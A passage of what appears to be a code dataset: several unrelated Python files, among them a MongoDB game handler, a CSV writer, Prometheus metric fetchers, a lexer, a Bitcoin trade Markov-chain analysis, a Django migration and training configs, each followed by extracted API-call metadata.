] | [((1558, 1722), 'src.planners.exact._create_model.create_model', 'create_model', (['self.opf_method', 'true_grid', 'surrogate_grid', 'sampled_scenarios', 't_current_ind', 'SOC_evs_current'], {'obj_factor': 'obj_factor', 'norm_factor': 'norm_factor'}), '(self.opf_method, true_grid, surrogate_grid, sampled_scenarios,\n t_current_ind, SOC_evs_current, obj_factor=obj_factor, norm_factor=\n norm_factor)\n', (1570, 1722), False, 'from src.planners.exact._create_model import create_model\n'), ((1856, 1889), 'src.planners.exact._read_model.read_model', 'read_model', (['model', 'surrogate_grid'], {}), '(model, surrogate_grid)\n', (1866, 1889), False, 'from src.planners.exact._read_model import read_model\n')] |
import pymongo
import pymongo.errors
import datetime
import os
from src.Error.ErrorManager import ErrorManager, ErrorCode
class DbHandler:
snapshot_pattern = "%Y%m%d_%H%M"
snapshot_name = "snapshot"
key_game = "kornettoh"
key_name = 'name'
def __init__(self, party_name=key_game):
self.party_name = party_name
self.data = None
self.connection_url = "mongodb+srv://"+os.environ['MONGO_DB_USER'] +\
":"+os.environ['MONGO_DB_PASSWORD'] +\
"@"+os.environ['MONGO_DB_INSTANCE']+"/"
def retrieve_game(self):
client_mongo_db = self.create_mongo_db_client()
try:
docs = client_mongo_db.pereBlaise.games.find({self.key_name: self.party_name})
if docs.count() is 1:
self.data = docs[0]
else:
raise ValueError()
except ValueError:
ErrorManager().add_error(ErrorCode.NO_DOCUMENT_FOUND, "retrieve_game")
client_mongo_db.close()
return
client_mongo_db.close()
def update_game(self):
client_mongo_db = self.create_mongo_db_client()
result = True
try:
replace_result = self.replace_one(client_mongo_db)
if replace_result.matched_count > 0:
print("Id updated " + str(replace_result.upserted_id))
else:
raise ValueError()
except ValueError:
ErrorManager().add_error(ErrorCode.NO_DOCUMENT_FOUND, "update_game")
result = False
client_mongo_db.close()
return result
def save_snapshot_game(self):
self.data[self.key_name] = self.snapshot_name +\
self.key_game +\
datetime.datetime.now().strftime(self.snapshot_pattern)
client_mongo = self.create_mongo_db_client()
inserted_id = None
try:
print(self.data)
if "_id" in self.data:
self.data.pop("_id")
insert_result = self.insert_one(client_mongo)
if insert_result is None or insert_result.inserted_id is None:
raise ValueError()
else:
inserted_id = insert_result.inserted_id
except ValueError:
ErrorManager().add_error(ErrorCode.NO_DOCUMENT_INSERTED, "save_snapshot")
client_mongo.close()
return inserted_id
def create_mongo_db_client(self):
try:
return pymongo.MongoClient(self.connection_url)
except pymongo.errors.ConfigurationError as e:
ErrorManager().add_error(ErrorCode.UNABLE_TO_CONNECT_DB, "create_mongo_db_client")
raise e
def insert_one(self, client_mongo_db):
return client_mongo_db.pereBlaise.games.insert_one(self.data)
def replace_one(self, client_mongo_db):
return client_mongo_db.pereBlaise.games.replace_one({self.key_name: self.party_name}, self.data)
def read_file_for_character(self, user_id):
if self.data is None:
self.retrieve_game()
for player in self.data['settings']['characters']:
if player["PLAYER"] == user_id:
return player
ErrorManager().add_error(ErrorCode.NO_CHARACTER_FOUND, "read_file_for_character")
| [
"pymongo.MongoClient",
"datetime.datetime.now",
"src.Error.ErrorManager.ErrorManager"
] | [((2552, 2592), 'pymongo.MongoClient', 'pymongo.MongoClient', (['self.connection_url'], {}), '(self.connection_url)\n', (2571, 2592), False, 'import pymongo\n'), ((3280, 3294), 'src.Error.ErrorManager.ErrorManager', 'ErrorManager', ([], {}), '()\n', (3292, 3294), False, 'from src.Error.ErrorManager import ErrorManager, ErrorCode\n'), ((1819, 1842), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1840, 1842), False, 'import datetime\n'), ((936, 950), 'src.Error.ErrorManager.ErrorManager', 'ErrorManager', ([], {}), '()\n', (948, 950), False, 'from src.Error.ErrorManager import ErrorManager, ErrorCode\n'), ((1489, 1503), 'src.Error.ErrorManager.ErrorManager', 'ErrorManager', ([], {}), '()\n', (1501, 1503), False, 'from src.Error.ErrorManager import ErrorManager, ErrorCode\n'), ((2350, 2364), 'src.Error.ErrorManager.ErrorManager', 'ErrorManager', ([], {}), '()\n', (2362, 2364), False, 'from src.Error.ErrorManager import ErrorManager, ErrorCode\n'), ((2660, 2674), 'src.Error.ErrorManager.ErrorManager', 'ErrorManager', ([], {}), '()\n', (2672, 2674), False, 'from src.Error.ErrorManager import ErrorManager, ErrorCode\n')] |
import csv
import io
from darcyai.file_stream import FileStream
from darcyai.output.output_stream import OutputStream
from darcyai.utils import validate_not_none, validate_type
class CSVOutputStream(OutputStream):
"""
OutputStream implementation that writes to a CSV file.
# Arguments
file_path (str): The path to the CSV file to write to.
delimiter (str): The delimiter to use in the CSV file. Defaults to `,`.
quotechar (str): The quote character to use in the CSV file. Defaults to `|`.
buffer_size (int): The size of the buffer to use when writing to theCSV file.
Defaults to `0`.
flush_interval (int): The number of seconds before flushing the buffer to disk.
Defaults to `0`.
# Examples
```python
>>> from darcyai.output.csv_output_stream import CSVOutputStream
>>> csv_output_stream = CSVOutputStream(file_path="output.csv",
delimiter=",",
quotechar="|",
buffer_size=1024*1024,
flush_interval=0)
```
"""
def __init__(
self,
file_path: str,
delimiter: str = ",",
quotechar: str = "|",
buffer_size: int = 0,
flush_interval: int = 0) -> None:
super().__init__()
validate_not_none(file_path, "file_path is required")
validate_type(file_path, str, "file_path must be a string")
validate_not_none(delimiter, "delimiter is required")
validate_type(delimiter, str, "delimiter must be a string")
validate_not_none(quotechar, "quotechar is required")
validate_type(quotechar, str, "quotechar must be a string")
self.__file_stream = FileStream(
file_path,
buffer_size=buffer_size,
flush_interval=flush_interval)
self.__delimiter = delimiter
self.__quotechar = quotechar
self.__delimiter = delimiter
self.__quotechar = quotechar
self.config_schema = []
def write(self, data: list) -> None:
"""
Writes the given data to the CSV file.
# Arguments
data (list): The data to write to the CSV file.
# Examples
```python
>>> from darcyai.output.csv_output_stream import CSVOutputStream
>>> csv_output_stream = CSVOutputStream(file_path="output.csv",
delimiter=",",
quotechar="|",
buffer_size=1024*1024,
flush_interval=0)
>>> csv_output_stream.write([["a", "b", "c"], ["d", "e", "f"]])
```
"""
if data is None:
return
validate_type(data, list, "data must be a list")
output = io.StringIO()
csv_writer = csv.writer(
output,
delimiter=self.__delimiter,
quotechar=self.__quotechar)
csv_writer.writerow(data)
self.__file_stream.write_string(output.getvalue())
def close(self) -> None:
"""
Closes the CSV file.
# Examples
```python
>>> from darcyai.output.csv_output_stream import CSVOutputStream
>>> csv_output_stream = CSVOutputStream(file_path="output.csv",
delimiter=",",
quotechar="|",
buffer_size=1024*1024,
flush_interval=0)
>>> csv_output_stream.close()
```
"""
self.__file_stream.close()
| [
"darcyai.utils.validate_not_none",
"darcyai.file_stream.FileStream",
"csv.writer",
"io.StringIO",
"darcyai.utils.validate_type"
] | [((1413, 1466), 'darcyai.utils.validate_not_none', 'validate_not_none', (['file_path', '"""file_path is required"""'], {}), "(file_path, 'file_path is required')\n", (1430, 1466), False, 'from darcyai.utils import validate_not_none, validate_type\n'), ((1475, 1534), 'darcyai.utils.validate_type', 'validate_type', (['file_path', 'str', '"""file_path must be a string"""'], {}), "(file_path, str, 'file_path must be a string')\n", (1488, 1534), False, 'from darcyai.utils import validate_not_none, validate_type\n'), ((1544, 1597), 'darcyai.utils.validate_not_none', 'validate_not_none', (['delimiter', '"""delimiter is required"""'], {}), "(delimiter, 'delimiter is required')\n", (1561, 1597), False, 'from darcyai.utils import validate_not_none, validate_type\n'), ((1606, 1665), 'darcyai.utils.validate_type', 'validate_type', (['delimiter', 'str', '"""delimiter must be a string"""'], {}), "(delimiter, str, 'delimiter must be a string')\n", (1619, 1665), False, 'from darcyai.utils import validate_not_none, validate_type\n'), ((1675, 1728), 'darcyai.utils.validate_not_none', 'validate_not_none', (['quotechar', '"""quotechar is required"""'], {}), "(quotechar, 'quotechar is required')\n", (1692, 1728), False, 'from darcyai.utils import validate_not_none, validate_type\n'), ((1737, 1796), 'darcyai.utils.validate_type', 'validate_type', (['quotechar', 'str', '"""quotechar must be a string"""'], {}), "(quotechar, str, 'quotechar must be a string')\n", (1750, 1796), False, 'from darcyai.utils import validate_not_none, validate_type\n'), ((1827, 1904), 'darcyai.file_stream.FileStream', 'FileStream', (['file_path'], {'buffer_size': 'buffer_size', 'flush_interval': 'flush_interval'}), '(file_path, buffer_size=buffer_size, flush_interval=flush_interval)\n', (1837, 1904), False, 'from darcyai.file_stream import FileStream\n'), ((2897, 2945), 'darcyai.utils.validate_type', 'validate_type', (['data', 'list', '"""data must be a list"""'], {}), "(data, list, 'data must be a 
list')\n", (2910, 2945), False, 'from darcyai.utils import validate_not_none, validate_type\n'), ((2964, 2977), 'io.StringIO', 'io.StringIO', ([], {}), '()\n', (2975, 2977), False, 'import io\n'), ((2999, 3073), 'csv.writer', 'csv.writer', (['output'], {'delimiter': 'self.__delimiter', 'quotechar': 'self.__quotechar'}), '(output, delimiter=self.__delimiter, quotechar=self.__quotechar)\n', (3009, 3073), False, 'import csv\n')] |
import json
import logging
from enum import Enum
from typing import Dict
import requests
from prometheus_client.parser import text_string_to_metric_families
from src.utils.exceptions import (NoMetricsGivenException,
MetricNotFoundException,
ReceivedUnexpectedDataException)
class RequestStatus(Enum):
SUCCESS = True
FAILED = False
def get_json(endpoint: str, logger: logging.Logger, params=None,
verify: bool = True):
if params is None:
params = {}
get_ret = requests.get(url=endpoint, params=params, timeout=10,
verify=verify, headers={'Connection': 'close'})
logger.debug("get_json: get_ret: %s", get_ret)
return json.loads(get_ret.content.decode('UTF-8'))
def get_prometheus(endpoint: str, logger: logging.Logger, verify: bool = True):
metrics = requests.get(endpoint, timeout=10, verify=verify, headers={
'Connection': 'close'}).content
logger.debug("Retrieved prometheus data from endpoint: " + endpoint)
return metrics.decode('utf-8')
def get_prometheus_metrics_data(endpoint: str,
requested_metrics: Dict[str, str],
logger: logging.Logger,
verify: bool = True) -> Dict:
"""
:param endpoint: The endpoint we are obtaining the data from
:param requested_metrics: A dict which is expected with the following
structure:
{
"metric": "optional" | any string
}
Where if the metric is set as "optional" an exception is not raised if that
metric is not found. Furthermore, this function will set the metric's value
to None if this is the case.
If the metric is not set as optional and it cannot be found at the data
source its value is set as None.
:param logger: Where logging should be sent
:param verify: Will verify the certificate if set to True
:return: The metrics with their values
"""
response = {}
if len(requested_metrics) == 0:
raise NoMetricsGivenException("No metrics given when requesting "
"prometheus data from " + endpoint)
metrics = get_prometheus(endpoint, logger, verify)
for family in text_string_to_metric_families(metrics):
for sample in family.samples:
if sample.name in requested_metrics:
if sample.name not in response:
if sample.labels != {}:
response[sample.name] = {}
response[sample.name][json.dumps(sample.labels)] = \
sample.value
else:
response[sample.name] = sample.value
else:
if sample.labels != {}:
response[sample.name][json.dumps(sample.labels)] = \
sample.value
else:
response[sample.name] = sample.value + \
response[sample.name]
missing_metrics = set(requested_metrics) - set(response)
for metric in missing_metrics:
if requested_metrics[metric].lower() == "optional":
response[metric] = None
else:
raise MetricNotFoundException(metric, endpoint)
return response
def transformed_data_processing_helper(component_name: str, configuration: Dict,
transformed_data: Dict,
*other_args) -> None:
"""
This function attempts to execute the appropriate processing function
on the transformed data based on a configuration. If the transformed
data is malformed, this function will raise an UnexpectedDataException
:param configuration: A dict with the following schema:
{
'<source_name>': {
'<data_index_Key>': <related_processing_fn>
}
}
:param transformed_data: The data received from the transformed
:param component_name: The name fo the component receiving the transformed
: data
:return: None
: Raises an UnexpectedDataException if the transformed_data is
malformed
"""
processing_performed = False
for source, processing_details in configuration.items():
# If the required source is not in the transformed data, then the
# transformed data is malformed, therefore raise an exception.
if source not in transformed_data:
raise ReceivedUnexpectedDataException(component_name)
# If the source is enabled, process its transformed data.
if transformed_data[source]:
# Check which index_key was passed by the transformer and
# execute the appropriate function.
sub_processing_performed = False
for data_index_key, processing_fn in processing_details.items():
if data_index_key in transformed_data[source]:
processing_fn(transformed_data[source][data_index_key],
*other_args)
processing_performed = True
sub_processing_performed = True
break
# If this is false, it means that no processing fn could be
# applied to the source's data
if not sub_processing_performed:
raise ReceivedUnexpectedDataException(component_name)
# If no processing is performed, it means that the data was not
# properly formatted, therefore raise an error.
if not processing_performed:
raise ReceivedUnexpectedDataException(component_name)
| [
"src.utils.exceptions.NoMetricsGivenException",
"prometheus_client.parser.text_string_to_metric_families",
"json.dumps",
"requests.get",
"src.utils.exceptions.ReceivedUnexpectedDataException",
"src.utils.exceptions.MetricNotFoundException"
] | [((570, 675), 'requests.get', 'requests.get', ([], {'url': 'endpoint', 'params': 'params', 'timeout': '(10)', 'verify': 'verify', 'headers': "{'Connection': 'close'}"}), "(url=endpoint, params=params, timeout=10, verify=verify,\n headers={'Connection': 'close'})\n", (582, 675), False, 'import requests\n'), ((2302, 2341), 'prometheus_client.parser.text_string_to_metric_families', 'text_string_to_metric_families', (['metrics'], {}), '(metrics)\n', (2332, 2341), False, 'from prometheus_client.parser import text_string_to_metric_families\n'), ((901, 987), 'requests.get', 'requests.get', (['endpoint'], {'timeout': '(10)', 'verify': 'verify', 'headers': "{'Connection': 'close'}"}), "(endpoint, timeout=10, verify=verify, headers={'Connection':\n 'close'})\n", (913, 987), False, 'import requests\n'), ((2094, 2191), 'src.utils.exceptions.NoMetricsGivenException', 'NoMetricsGivenException', (["('No metrics given when requesting prometheus data from ' + endpoint)"], {}), "(\n 'No metrics given when requesting prometheus data from ' + endpoint)\n", (2117, 2191), False, 'from src.utils.exceptions import NoMetricsGivenException, MetricNotFoundException, ReceivedUnexpectedDataException\n'), ((5820, 5867), 'src.utils.exceptions.ReceivedUnexpectedDataException', 'ReceivedUnexpectedDataException', (['component_name'], {}), '(component_name)\n', (5851, 5867), False, 'from src.utils.exceptions import NoMetricsGivenException, MetricNotFoundException, ReceivedUnexpectedDataException\n'), ((3348, 3389), 'src.utils.exceptions.MetricNotFoundException', 'MetricNotFoundException', (['metric', 'endpoint'], {}), '(metric, endpoint)\n', (3371, 3389), False, 'from src.utils.exceptions import NoMetricsGivenException, MetricNotFoundException, ReceivedUnexpectedDataException\n'), ((4716, 4763), 'src.utils.exceptions.ReceivedUnexpectedDataException', 'ReceivedUnexpectedDataException', (['component_name'], {}), '(component_name)\n', (4747, 4763), False, 'from src.utils.exceptions import 
NoMetricsGivenException, MetricNotFoundException, ReceivedUnexpectedDataException\n'), ((5604, 5651), 'src.utils.exceptions.ReceivedUnexpectedDataException', 'ReceivedUnexpectedDataException', (['component_name'], {}), '(component_name)\n', (5635, 5651), False, 'from src.utils.exceptions import NoMetricsGivenException, MetricNotFoundException, ReceivedUnexpectedDataException\n'), ((2619, 2644), 'json.dumps', 'json.dumps', (['sample.labels'], {}), '(sample.labels)\n', (2629, 2644), False, 'import json\n'), ((2890, 2915), 'json.dumps', 'json.dumps', (['sample.labels'], {}), '(sample.labels)\n', (2900, 2915), False, 'import json\n')] |
import re
from alr.input_streams import InputStream
from alr.instances import Terminal, Token, END_TERMINAL_NAME
class LexerException(Exception):
pass
class Lexer:
def next(self) -> Token:
pass
def findMatchInfo(terminals: [Terminal], data: str):
for terminal in terminals:
match = re.match(terminal.regexp, data)
if match:
return match, terminal
return None
def lexer(terminals: [Terminal], skip_terminals: [Terminal], input_stream: InputStream) -> Token:
source = input_stream.source
len_source = len(source)
while not input_stream.is_consumed:
data = input_stream.get()
match_info = findMatchInfo(skip_terminals, data)
if match_info:
match, _ = match_info
input_stream.consume(match.end())
continue
match_info = findMatchInfo(terminals, data)
if match_info:
match, terminal = match_info
end = match.end()
yield Token(terminal, input_stream.index, input_stream.index + end, source)
input_stream.consume(end)
continue
raise LexerException(f'pos: {input_stream.index}: Can not parse {data}')
endTerminal = Terminal(END_TERMINAL_NAME, len(terminals))
yield Token(endTerminal, len_source, len_source, source)
| [
"alr.instances.Token",
"re.match"
] | [((317, 348), 're.match', 're.match', (['terminal.regexp', 'data'], {}), '(terminal.regexp, data)\n', (325, 348), False, 'import re\n'), ((1281, 1331), 'alr.instances.Token', 'Token', (['endTerminal', 'len_source', 'len_source', 'source'], {}), '(endTerminal, len_source, len_source, source)\n', (1286, 1331), False, 'from alr.instances import Terminal, Token, END_TERMINAL_NAME\n'), ((999, 1068), 'alr.instances.Token', 'Token', (['terminal', 'input_stream.index', '(input_stream.index + end)', 'source'], {}), '(terminal, input_stream.index, input_stream.index + end, source)\n', (1004, 1068), False, 'from alr.instances import Terminal, Token, END_TERMINAL_NAME\n')] |
import sys
sys.path.append('../lib')
import exchange
import datetime
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from scipy.stats import norm
def transition_probabilities(chain, offset=1):
    """Estimate the empirical *offset*-step transition matrix of *chain*.

    :param chain: 1-D numpy array of observed states
    :param offset: step distance between "source" and "destination" states
    :return: ``(matrix, state_space)`` where ``state_space`` maps each state
             value to its row/column index in ``matrix``
    """
    states = np.array(list(set(chain)))
    state_space = {state: index for index, state in enumerate(states)}
    transition_matrix = np.zeros((states.shape[0], states.shape[0]))
    for src in states:
        # Occurrences of src that still have a successor `offset` steps ahead.
        departures = np.sum(chain == src) - np.sum(chain[-offset:] == src)
        # Boolean mask of positions exactly `offset` steps after a src occurrence.
        followers = np.concatenate(([False] * offset, (chain == src)[:-offset]))
        row = state_space[src]
        for dst in states:
            transition_matrix[row][state_space[dst]] = np.sum(chain[followers] == dst) / departures
    return transition_matrix, state_space
def main():
    """Estimate daily BTC up/down transition probabilities from Binance trades.

    For each day in a 500-day window starting 2018-04-01, classifies each
    trade as an up (+1) or down (-1) price move, fits a two-state Markov
    chain to that sequence, records the self-transition probabilities
    p_11 and p_00, then plots the distribution of their day-to-day
    differences with fitted normal curves.
    """
    e = exchange.Exchange('../lib/binance.db')
    times = [datetime.datetime(2018, 4, 1) + datetime.timedelta(days=i) for i in range(500)]
    p_00 = []
    p_11 = []
    prices = []
    for start, end in zip(times[:-1], times[1:]):
        print(start)
        it = e.get_orders('BTCUSDT', start.timestamp() * 1000, end.timestamp() * 1000)
        trade_data = {'price': [], 'time': [], 'side': []}
        for order in it:
            trade_data['price'].append(order.end_price)
            trade_data['time'].append(order.time)
            trade_data['side'].append(order.buyer) #True if market order is a buy
        trade_data = pd.DataFrame(trade_data)
        # Log-returns; the leading 1 keeps the series aligned with the trades.
        trade_data['price_change'] = np.log(np.concatenate(([1], trade_data['price'].values[1:] / trade_data['price'].values[:-1])))
        movement = np.zeros(trade_data.shape[0])
        movement[trade_data['price_change'] > 0] = 1
        movement[trade_data['price_change'] < 0] = -1
        # Drop flat ticks so the chain only has the two states +1 / -1.
        chain = movement[movement != 0]
        P, states = transition_probabilities(chain)
        # NOTE(review): the bare except presumably guards days where one state
        # never occurs (KeyError in `states`) — confirm before narrowing it.
        try:
            p_11.append(P[states[1]][states[1]])
            p_00.append(P[states[-1]][states[-1]])
        except:
            pass
        prices.append(np.mean(trade_data['price']))
    #fig, ax1 = plt.subplots()
    #ax2 = ax1.twinx()
    #ax1.plot(prices, color='blue')
    #ax2.plot(p_11, color='green', label='p_11')
    #ax2.plot(p_00, color='red', label='p_00')
    #ax2.legend()
    #ax1.set_xlabel('Day')
    #ax1.set_ylabel('BTC Price')
    #ax2.set_ylabel('Probability')
    plt.figure()
    plt.hist(np.diff(p_00), 50, density=True)
    loc, scale = norm.fit(np.diff(p_00))
    x = np.linspace(np.min(np.diff(p_00)), np.max(np.diff(p_00)), 100)
    plt.plot(x, norm.pdf(x, loc=loc, scale=scale))
    plt.figure()
    plt.hist(np.diff(p_11), 50, density=True)
    x = np.linspace(np.min(np.diff(p_11)), np.max(np.diff(p_11)), 100)
    loc, scale = norm.fit(np.diff(p_11))
    plt.plot(x, norm.pdf(x, loc=loc, scale=scale))
    plt.show()
if __name__ == '__main__':
    main()
| [
"datetime.datetime",
"numpy.mean",
"numpy.diff",
"numpy.sum",
"numpy.zeros",
"matplotlib.pyplot.figure",
"exchange.Exchange",
"scipy.stats.norm.pdf",
"numpy.concatenate",
"pandas.DataFrame",
"datetime.timedelta",
"sys.path.append",
"matplotlib.pyplot.show"
] | [((11, 36), 'sys.path.append', 'sys.path.append', (['"""../lib"""'], {}), "('../lib')\n", (26, 36), False, 'import sys\n'), ((351, 395), 'numpy.zeros', 'np.zeros', (['(states.shape[0], states.shape[0])'], {}), '((states.shape[0], states.shape[0]))\n', (359, 395), True, 'import numpy as np\n'), ((789, 827), 'exchange.Exchange', 'exchange.Exchange', (['"""../lib/binance.db"""'], {}), "('../lib/binance.db')\n", (806, 827), False, 'import exchange\n'), ((2483, 2495), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (2493, 2495), True, 'import matplotlib.pyplot as plt\n'), ((2730, 2742), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (2740, 2742), True, 'import matplotlib.pyplot as plt\n'), ((2977, 2987), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2985, 2987), True, 'import matplotlib.pyplot as plt\n'), ((518, 576), 'numpy.concatenate', 'np.concatenate', (['([False] * offset, (chain == i)[:-offset])'], {}), '(([False] * offset, (chain == i)[:-offset]))\n', (532, 576), True, 'import numpy as np\n'), ((1476, 1500), 'pandas.DataFrame', 'pd.DataFrame', (['trade_data'], {}), '(trade_data)\n', (1488, 1500), True, 'import pandas as pd\n'), ((1663, 1692), 'numpy.zeros', 'np.zeros', (['trade_data.shape[0]'], {}), '(trade_data.shape[0])\n', (1671, 1692), True, 'import numpy as np\n'), ((2513, 2526), 'numpy.diff', 'np.diff', (['p_00'], {}), '(p_00)\n', (2520, 2526), True, 'import numpy as np\n'), ((2576, 2589), 'numpy.diff', 'np.diff', (['p_00'], {}), '(p_00)\n', (2583, 2589), True, 'import numpy as np\n'), ((2686, 2719), 'scipy.stats.norm.pdf', 'norm.pdf', (['x'], {'loc': 'loc', 'scale': 'scale'}), '(x, loc=loc, scale=scale)\n', (2694, 2719), False, 'from scipy.stats import norm\n'), ((2760, 2773), 'numpy.diff', 'np.diff', (['p_11'], {}), '(p_11)\n', (2767, 2773), True, 'import numpy as np\n'), ((2898, 2911), 'numpy.diff', 'np.diff', (['p_11'], {}), '(p_11)\n', (2905, 2911), True, 'import numpy as np\n'), ((2933, 2966), 
'scipy.stats.norm.pdf', 'norm.pdf', (['x'], {'loc': 'loc', 'scale': 'scale'}), '(x, loc=loc, scale=scale)\n', (2941, 2966), False, 'from scipy.stats import norm\n'), ((442, 460), 'numpy.sum', 'np.sum', (['(chain == i)'], {}), '(chain == i)\n', (448, 460), True, 'import numpy as np\n'), ((463, 491), 'numpy.sum', 'np.sum', (['(chain[-offset:] == i)'], {}), '(chain[-offset:] == i)\n', (469, 491), True, 'import numpy as np\n'), ((846, 875), 'datetime.datetime', 'datetime.datetime', (['(2018)', '(4)', '(1)'], {}), '(2018, 4, 1)\n', (863, 875), False, 'import datetime\n'), ((878, 904), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': 'i'}), '(days=i)\n', (896, 904), False, 'import datetime\n'), ((1550, 1642), 'numpy.concatenate', 'np.concatenate', (["([1], trade_data['price'].values[1:] / trade_data['price'].values[:-1])"], {}), "(([1], trade_data['price'].values[1:] / trade_data['price'].\n values[:-1]))\n", (1564, 1642), True, 'import numpy as np\n'), ((2105, 2133), 'numpy.mean', 'np.mean', (["trade_data['price']"], {}), "(trade_data['price'])\n", (2112, 2133), True, 'import numpy as np\n'), ((2622, 2635), 'numpy.diff', 'np.diff', (['p_00'], {}), '(p_00)\n', (2629, 2635), True, 'import numpy as np\n'), ((2645, 2658), 'numpy.diff', 'np.diff', (['p_00'], {}), '(p_00)\n', (2652, 2658), True, 'import numpy as np\n'), ((2824, 2837), 'numpy.diff', 'np.diff', (['p_11'], {}), '(p_11)\n', (2831, 2837), True, 'import numpy as np\n'), ((2847, 2860), 'numpy.diff', 'np.diff', (['p_11'], {}), '(p_11)\n', (2854, 2860), True, 'import numpy as np\n'), ((666, 701), 'numpy.sum', 'np.sum', (['(chain[relevant_states] == j)'], {}), '(chain[relevant_states] == j)\n', (672, 701), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.20 on 2020-05-13 23:41
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import smart_selects.db_fields
class Migration(migrations.Migration):
    """Auto-generated Django migration: creates the MonitoringReporting model."""
    dependencies = [
        ('survey', '0007_auto_20200513_0150'),
    ]
    operations = [
        migrations.CreateModel(
            name='MonitoringReporting',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('reporting_date', models.DateField()),
                ('number', models.FloatField(blank=True, null=True)),
                ('source_text', models.CharField(blank=True, max_length=1500, null=True)),
                ('source_url', models.URLField(blank=True, max_length=1500, null=True)),
                ('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='+', to='survey.ItemCategory')),
                ('item', smart_selects.db_fields.ChainedForeignKey(blank=True, chained_field='category', chained_model_field='category', null=True, on_delete=django.db.models.deletion.CASCADE, to='survey.Item')),
            ],
        ),
    ]
| [
"django.db.models.FloatField",
"django.db.models.DateField",
"django.db.models.ForeignKey",
"django.db.models.AutoField",
"django.db.models.URLField",
"django.db.models.CharField"
] | [((472, 565), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (488, 565), False, 'from django.db import migrations, models\n'), ((599, 617), 'django.db.models.DateField', 'models.DateField', ([], {}), '()\n', (615, 617), False, 'from django.db import migrations, models\n'), ((647, 687), 'django.db.models.FloatField', 'models.FloatField', ([], {'blank': '(True)', 'null': '(True)'}), '(blank=True, null=True)\n', (664, 687), False, 'from django.db import migrations, models\n'), ((722, 778), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(1500)', 'null': '(True)'}), '(blank=True, max_length=1500, null=True)\n', (738, 778), False, 'from django.db import migrations, models\n'), ((812, 867), 'django.db.models.URLField', 'models.URLField', ([], {'blank': '(True)', 'max_length': '(1500)', 'null': '(True)'}), '(blank=True, max_length=1500, null=True)\n', (827, 867), False, 'from django.db import migrations, models\n'), ((899, 1010), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""+"""', 'to': '"""survey.ItemCategory"""'}), "(on_delete=django.db.models.deletion.CASCADE, related_name\n ='+', to='survey.ItemCategory')\n", (916, 1010), False, 'from django.db import migrations, models\n')] |
#
# Miscellenous tools
#
from argparse import ArgumentParser
import inspect
from pprint import pprint
def _parse_bool(value):
    """argparse `type` for bool-defaulted parameters.

    Plain ``type=bool`` would treat any non-empty string — including
    ``"False"`` — as True. Here ``'false'``, ``'0'``, ``'no'`` and the
    empty string (case-insensitively) parse as False.
    """
    if isinstance(value, bool):
        return value
    return value.strip().lower() not in ("false", "0", "no", "")


def parse_keyword_arguments(unparsed_args, class_object, debug=True):
    """
    Take unparsed arguments and a class object,
    check what keyword arguments class's __init__
    takes, create ArgumentParser object for them
    and parse them through. Return a dictionary
    mapping keywords to the parsed arguments, and remaining
    unparsed arguments.

    NOTE: class_object should have attribute "REQUIRED_ARGUMENTS",
          which is a list containing all keyword names that
          are required. If keyword is not required, the default
          value from __init__ definition will be used.

    Returns tuple of (
        dictionary mapping keyword names to parsed values,
        remaining unparsed args
    )

    If debug is true, print out what arguments are being gathered.
    """
    parser = ArgumentParser()
    signature = inspect.signature(class_object.__init__)
    for argument in signature.parameters.values():
        if argument.default is argument.empty:
            # 'self' and positional parameters carry no default; skip them.
            continue
        default = argument.default
        if isinstance(default, bool):
            # bool("False") is True — use an explicit string-to-bool converter.
            arg_type = _parse_bool
        elif default is None:
            # type(None)(value) raises TypeError; fall back to plain strings.
            arg_type = str
        else:
            arg_type = type(default)
        parser.add_argument(
            "--{}".format(argument.name),
            type=arg_type,
            default=default,
            required=argument.name in class_object.REQUIRED_ARGUMENTS
        )
    # parse_known_args leaves unrecognised flags for later parsers to consume
    # (and lets callers detect duplicates of the same variable name).
    class_arguments, unparsed_args = parser.parse_known_args(unparsed_args)
    class_arguments = vars(class_arguments)

    if debug:
        print("\nArguments for {}".format(class_object.__name__))
        pprint(class_arguments, indent=4, width=1)
        # Coolio newline
        print("")
    return class_arguments, unparsed_args
| [
"inspect.signature",
"pprint.pprint",
"argparse.ArgumentParser"
] | [((913, 929), 'argparse.ArgumentParser', 'ArgumentParser', ([], {}), '()\n', (927, 929), False, 'from argparse import ArgumentParser\n'), ((946, 986), 'inspect.signature', 'inspect.signature', (['class_object.__init__'], {}), '(class_object.__init__)\n', (963, 986), False, 'import inspect\n'), ((1622, 1664), 'pprint.pprint', 'pprint', (['class_arguments'], {'indent': '(4)', 'width': '(1)'}), '(class_arguments, indent=4, width=1)\n', (1628, 1664), False, 'from pprint import pprint\n')] |
from omegaconf import OmegaConf
def default_detection_train_config():
    """Return an OmegaConf node with the default detection-training hyper-parameters."""
    # FIXME currently using args for train config, will revisit, perhaps move to Hydra
    return OmegaConf.create({
        # dataset
        'skip_crowd_during_training': True,
        # augmentation
        'input_rand_hflip': True,
        'train_scale_min': 0.1,
        'train_scale_max': 2.0,
        'autoaugment_policy': None,
        # optimization
        'momentum': 0.9,
        'learning_rate': 0.08,
        'lr_warmup_init': 0.008,
        'lr_warmup_epoch': 1.0,
        'first_lr_drop_epoch': 200.0,
        'second_lr_drop_epoch': 250.0,
        'clip_gradients_norm': 10.0,
        'num_epochs': 300,
        # regularization l2 loss.
        'weight_decay': 4e-5,
        'lr_decay_method': 'cosine',
        'moving_average_decay': 0.9998,
        'ckpt_var_scope': None,
    })
| [
"omegaconf.OmegaConf.create"
